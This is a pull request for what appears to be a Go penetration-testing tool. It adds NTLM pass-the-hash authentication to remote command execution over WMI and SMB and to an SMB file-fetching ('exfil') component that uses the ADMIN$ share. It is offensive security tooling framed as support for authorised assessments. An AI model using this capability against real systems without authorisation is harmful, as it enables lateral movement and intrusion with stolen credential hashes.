### PR TITLE
Add NTLM hash authentication support for SMB and WMI command execution

### DIFF
--- a/internal/pentest/smb/exec.go
+++ b/internal/pentest/smb/exec.go
@@ -73,6 +73,7 @@ func PerformCommandExecution(ctx context.Context, target string, config *smbfern
 type ExecutionCredentials struct {
 	Username string
 	Password string
+	NTLMHash string
 	Domain   string
 }
 
@@ -99,9 +100,14 @@ func performAuthentication(ctx context.Context, target string, config *smbfern.P
 				if attempt.Password != nil {
 					password = *attempt.Password
 				}
+				ntlmHash := ""
+				if attempt.NtlmHash != nil {
+					ntlmHash = *attempt.NtlmHash
+				}
 				credentials = &ExecutionCredentials{
 					Username: attempt.Username,
 					Password: password,
+					NTLMHash: ntlmHash,
 					Domain:   domain,
 				}
 				break
@@ -131,8 +137,8 @@ func executeCommandWithWMI(ctx context.Context, host, command string, credential
 
 	log.Info("Executing command via WMI", svc1log.SafeParam("command", command))
 
-	// Create WMI executor
-	executor, err := msrpc.NewWMIExecutor(ctx, host, credentials.Username, credentials.Password, credentials.Domain)
+	// Create WMI executor with hash support
+	executor, err := msrpc.NewWMIExecutorWithHash(ctx, host, credentials.Username, credentials.Password, credentials.NTLMHash, credentials.Domain)
 	if err != nil {
 		log.Error("Failed to create WMI executor", svc1log.SafeParam("error", err.Error()))
 		return &commonprotocolfern.SmbCommandExecution{

--- a/internal/protocol/msrpc/wmi.go
+++ b/internal/protocol/msrpc/wmi.go
@@ -44,11 +44,18 @@ type WMIExecutor struct {
 	host           string
 	username       string
 	password       string
+	ntlmHash       string
 	domain         string
 }
 
 // NewWMIExecutor creates a new WMI executor with proper authentication
+// Supports both password and NTLM hash authentication
 func NewWMIExecutor(ctx context.Context, host, username, password, domain string) (*WMIExecutor, error) {
+	return NewWMIExecutorWithHash(ctx, host, username, password, "", domain)
+}
+
+// NewWMIExecutorWithHash creates a new WMI executor with NTLM hash authentication support
+func NewWMIExecutorWithHash(ctx context.Context, host, username, password, ntlmHash, domain string) (*WMIExecutor, error) {
 	log := svc1log.FromContext(ctx)
 
 	// Set up DCE/RPC authentication options
@@ -58,7 +65,15 @@ func NewWMIExecutor(ctx context.Context, host, username, password, domain string
 	} else {
 		credStr = username
 	}
-	cred := credential.NewFromPassword(credStr, password)
+
+	// Use NTLM hash authentication if provided, otherwise use password
+	var cred any
+	if ntlmHash != "" {
+		log.Info("Using NTLM hash authentication for WMI")
+		cred = credential.NewFromNTHash(credStr, ntlmHash)
+	} else {
+		cred = credential.NewFromPassword(credStr, password)
+	}
 
 	// Create GSSAPI credential with proper formatting
 	gssapiCred := gssapi.NewCredential("", nil, gssapi.InitiateAndAccept, cred)
@@ -83,6 +98,7 @@ func NewWMIExecutor(ctx context.Context, host, username, password, domain string
 		host:     host,
 		username: username,
 		password: password,
+		ntlmHash: ntlmHash,
 		domain:   domain,
 	}
 
@@ -151,7 +167,14 @@ func (w *WMIExecutor) initialize(ctx context.Context) error {
 		} else {
 			credStr = w.username
 		}
-		cred := credential.NewFromPassword(credStr, w.password)
+
+		// Use NTLM hash authentication if provided, otherwise use password
+		var cred any
+		if w.ntlmHash != "" {
+			cred = credential.NewFromNTHash(credStr, w.ntlmHash)
+		} else {
+			cred = credential.NewFromPassword(credStr, w.password)
+		}
 		gssapiCred := gssapi.NewCredential("", nil, gssapi.InitiateAndAccept, cred)
 
 		// Configure connection options with endpoints and authentication
@@ -232,6 +255,7 @@ func (w *WMIExecutor) ExecuteCommand(ctx context.Context, command string) (map[s
 				Host:             w.host,
 				Username:         w.username,
 				Password:         w.password,
+				NTLMHash:         w.ntlmHash,
 				Domain:           w.domain,
 				Share:            "ADMIN$",
 				SharePath:        `C:\Windows`,

--- a/internal/protocol/smb/exfil.go
+++ b/internal/protocol/smb/exfil.go
@@ -2,6 +2,7 @@ package smb
 
 import (
 	"context"
+	"encoding/hex"
 	"errors"
 	"fmt"
 	"io"
@@ -28,6 +29,7 @@ type OutputFileFetcher struct {
 	Host     string // SMB server hostname or IP address
 	Username string // Username for authentication
 	Password string // Password for authentication
+	NTLMHash string // NTLM hash for pass-the-hash authentication (hex string)
 	Domain   string // Domain for authentication (optional)
 
 	// SMB Share Configuration
@@ -81,11 +83,22 @@ func (o *OutputFileFetcher) GetOutput(ctx context.Context, writer io.Writer) err
 	}
 	defer func() { _ = conn.Close() }()
 
-	// Create NTLM initiator
+	// Create NTLM initiator with hash or password authentication
 	initiator := &smb2.NTLMInitiator{
-		User:     o.Username,
-		Password: o.Password,
-		Domain:   o.Domain,
+		User:   o.Username,
+		Domain: o.Domain,
+	}
+
+	// Use NTLM hash if provided, otherwise use password
+	if o.NTLMHash != "" {
+		hashBytes, err := hex.DecodeString(o.NTLMHash)
+		if err != nil {
+			return fmt.Errorf("decode NTLM hash: %w", err)
+		}
+		initiator.Hash = hashBytes
+		log.Info("Using NTLM hash authentication for SMB output fetch")
+	} else {
+		initiator.Password = o.Password
 	}
 
 	// Create SMB dialer and session


### PR DESCRIPTION
### TL;DR

Added NTLM hash authentication support for SMB command execution and file operations.

### What changed?

- Added `NTLMHash` field to `ExecutionCredentials` struct to store NTLM hash values
- Created `NewWMIExecutorWithHash` function that supports both password and hash-based authentication
- Modified the SMB `OutputFileFetcher` to support NTLM hash authentication
- Updated credential handling in WMI executor to use hash authentication when a hash is provided
- Ensured backward compatibility by maintaining existing password-based authentication methods

### How to test?

1. Attempt SMB command execution using an NTLM hash instead of a password:
   ```
   // Example with hash authentication
   credentials := &ExecutionCredentials{
     Username: "user",
     NTLMHash: "1a2b3c4d5e6f...",
     Domain: "DOMAIN"
   }
   ```

2. Test file exfiltration using NTLM hash authentication:
   ```
   fetcher := &OutputFileFetcher{
     Host: "target",
     Username: "user",
     NTLMHash: "1a2b3c4d5e6f...",
     Domain: "DOMAIN",
     Share: "ADMIN$"
   }
   ```

3. Verify that existing password-based authentication still works correctly

### Why make this change?

Pass-the-hash is a critical technique in penetration testing that allows authentication using NTLM hashes without knowing the plaintext password. This enhancement enables more flexible authentication options during security assessments, particularly in scenarios where password hashes have been obtained but the actual passwords remain unknown.